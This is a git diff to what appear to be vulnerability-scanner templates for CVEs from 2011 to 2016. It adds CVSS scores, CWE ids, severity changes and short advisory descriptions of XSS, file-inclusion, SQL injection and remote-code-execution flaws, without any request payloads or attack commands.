diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 05714d8b90..1fe124e5d4 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -10,6 +10,11 @@ info: - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index d7ca7ac309..ed80489fb4 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 05ae7013e2..4b827a6e88 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index b081219b53..a65162e1be 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index e4dff03126..61d21ce54c 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -7,6 +7,11 @@ info: author: geeknik severity: critical tags: cve,cve2014,sqli,lighttpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index d25a27bc60..b593394d70 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -9,6 +9,11 @@ info: - https://snyk.io/vuln/npm:st:20140206 severity: high tags: cve,cve2014,lfi,nodejs,st + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2014-3744 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index cc9b0f8793..42932519fa 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -8,6 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." requests: - method: GET diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 95bd42d005..8e6d8424d8 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d1f974d279..d226a920db 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 07e8d11779..6c5db06412 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -3,13 +3,18 @@ id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky - severity: high + severity: critical description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 requests: - method: GET path: diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index bc9fe62650..7b52384af9 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html tags: cve,cve2014,lfi + description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 81ae8ce817..12b29d2090 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 tags: cve,2014,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index b9a13af787..75c35ff769 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index f70ef7d40a..67ed7522de 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2080 info: name: Eclipse Jetty Remote Leakage author: pikpikcu - severity: medium + severity: high reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html @@ -11,6 +11,11 @@ info: description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 requests: - method: POST diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index ddb93e60fb..b39565c245 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -8,6 +8,7 @@ info: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 63d74145e0..23b0e18646 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index cc437482ec..266da313a8 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -7,6 +7,11 @@ info: description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 tags: cve,cve2015,xss,sourcebans + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-8349 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index dbe4e9c097..55ff02a7c7 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -6,6 +6,11 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 35e2bc110b..d9b0c56e21 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -9,6 +9,11 @@ info: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d5c3fea0f8..d65a7b2262 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 tags: cve,cve2015,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-9414 + cwe-id: CWE-79 + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index bcd3d48d4d..aff9aca94d 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -8,6 +8,12 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 676d804499..55a0fb1e4e 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -7,6 +7,10 @@ info: reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high tags: cve,cve2016,adobe,aem + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-0957 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 0d3a928804..7570661517 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 459e6c5829..51c400aa1e 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b0abb144a2..9e8645e466 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000128 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 9b0f14449b..fbeb35821b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000129 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 18141078b1..04c6324c51 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index a9c8dcbf8d..f9e0d4a700 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin e-search v1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index fa9404875a..c33a51fe7a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000132 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 48e7531114..64968b022f 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 99d42687c9..d11a917306 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 48480b29c5..5fbb768196 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index 12a3ce8d62..eb4ae2195c 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000137 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index b92f330cd6..ee73a4ce9f 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000138 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin indexisto v1.0.5" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 05a6a6285a..b3ff2bbb88 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000139 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 8f25cbc37c..32a78c7534 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000140 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index b45691d8da..4d9e921b14 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000146 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index fbb5d33d47..7340d0b0c2 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index b5e0487209..7998ec03d5 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 2dd82e5904..d44cabdaa9 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000152 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index e1ae1a74aa..8e9ef8b66c 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index c459fd33e9..dfbff06092 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 4772141fcf..70f109f44c 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000155 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 479d0f70f3..ff51ed5643 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -2,10 +2,15 @@ id: CVE-2016-10033 info: name: Wordpress 4.6 Remote Code Execution author: princechaddha - severity: high + severity: critical description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. reference: 